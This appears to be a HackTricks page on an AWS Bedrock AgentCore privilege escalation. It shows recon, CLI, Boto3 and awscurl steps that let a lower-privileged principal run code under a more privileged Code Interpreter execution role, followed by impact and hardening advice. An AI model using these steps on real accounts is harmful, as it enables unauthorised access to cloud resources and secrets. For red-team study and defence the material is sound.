AWS - Bedrock PrivEsc

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Amazon Bedrock AgentCore

bedrock-agentcore:StartCodeInterpreterSession + bedrock-agentcore:InvokeCodeInterpreter - Code Interpreter Execution-Role Pivot

AgentCore Code Interpreter is a managed execution environment. Custom Code Interpreters can be configured with an executionRoleArn that “provides permissions for the code interpreter to access AWS services”.

If a lower-privileged IAM principal can start + invoke a Code Interpreter session that is configured with a more privileged execution role, the caller can effectively pivot into the execution role’s permissions (lateral movement / privilege escalation depending on role scope).

Note

This is typically a misconfiguration / excessive permissions issue (granting wide permissions to the interpreter execution role and/or granting broad invoke access). AWS explicitly warns to avoid privilege escalation by ensuring execution roles have equal or fewer privileges than identities allowed to invoke.

Preconditions (common misconfiguration)

• A custom code interpreter exists with an over-privileged execution role (ex: access to sensitive S3/Secrets/SSM or IAM-admin-like capabilities).
• A user (developer/auditor/CI identity) has permissions to:
  • start sessions: bedrock-agentcore:StartCodeInterpreterSession
  • invoke tools: bedrock-agentcore:InvokeCodeInterpreter
• (Optional) The user can also create interpreters: bedrock-agentcore:CreateCodeInterpreter (lets them create a new interpreter configured with an execution role, depending on org guardrails).

Recon (identify custom interpreters and execution role usage)

List interpreters (control-plane) and inspect their configuration:

aws bedrock-agentcore-control list-code-interpreters
aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id <CODE_INTERPRETER_ID>

The create-code-interpreter command supports --execution-role-arn which defines what AWS permissions the interpreter will have.

Step 1 - Start a session (this returns a sessionId, not an interactive shell)

SESSION_ID=$(
  aws bedrock-agentcore start-code-interpreter-session \
    --code-interpreter-identifier <CODE_INTERPRETER_IDENTIFIER> \
    --name "arte-oussama" \
    --query sessionId \
    --output text
)

echo "SessionId: $SESSION_ID"

Step 2 - Invoke code execution (Boto3 or signed HTTPS)

There is no interactive python shell from start-code-interpreter-session. Execution happens via InvokeCodeInterpreter.

Option A - Boto3 example (execute Python + verify identity):

import boto3

client = boto3.client("bedrock-agentcore", region_name="<REGION>")

# Execute python inside the Code Interpreter session
resp = client.invoke_code_interpreter(
    codeInterpreterIdentifier="<CODE_INTERPRETER_IDENTIFIER>",
    sessionId="<SESSION_ID>",
    name="executeCode",
    arguments={
        "language": "python",
        "code": "import boto3; print(boto3.client('sts').get_caller_identity())"
    }
)

# Response is streamed; print events for visibility
for event in resp.get("stream", []):
    print(event)

If the interpreter is configured with an execution role, the sts:GetCallerIdentity() output should reflect that role’s identity (not the low-priv caller), demonstrating the pivot.

Option B - Signed HTTPS call (awscurl):

awscurl -X POST \
  "https://bedrock-agentcore.<Region>.amazonaws.com/code-interpreters/<CODE_INTERPRETER_IDENTIFIER>/tools/invoke" \
  -H "Content-Type: application/json" \
  -H "Accept: application/json" \
  -H "x-amzn-code-interpreter-session-id: <SESSION_ID>" \
  --service bedrock-agentcore \
  --region <Region> \
  -d '{
    "name": "executeCode",
    "arguments": {
      "language": "python",
      "code": "print(\"Hello from AgentCore\")"
    }
  }'

Impact

• Lateral movement into whatever AWS access the interpreter execution role has.
• Privilege escalation if the interpreter execution role is more privileged than the caller.
• Harder detection if CloudTrail data events for interpreter invocations are not enabled (invocations may not be logged by default, depending on configuration).

Mitigations / Hardening

• Least privilege on the interpreter executionRoleArn (treat it like Lambda execution roles / CI roles).
• Restrict who can invoke (bedrock-agentcore:InvokeCodeInterpreter) and who can start sessions.
• Use SCPs to deny InvokeCodeInterpreter except for approved agent runtime roles (org-level enforcement can be necessary).
• Enable appropriate CloudTrail data events for AgentCore where applicable; alert on unexpected invocations and session creation.

References

• Sonrai: AWS AgentCore privilege escalation path (SCP mitigation)
• Sonrai: Credential exfiltration paths in AWS code interpreters (MMDS)
• AWS CLI: create-code-interpreter (--execution-role-arn)
• AWS CLI: start-code-interpreter-session (returns sessionId)
• AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)
• AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.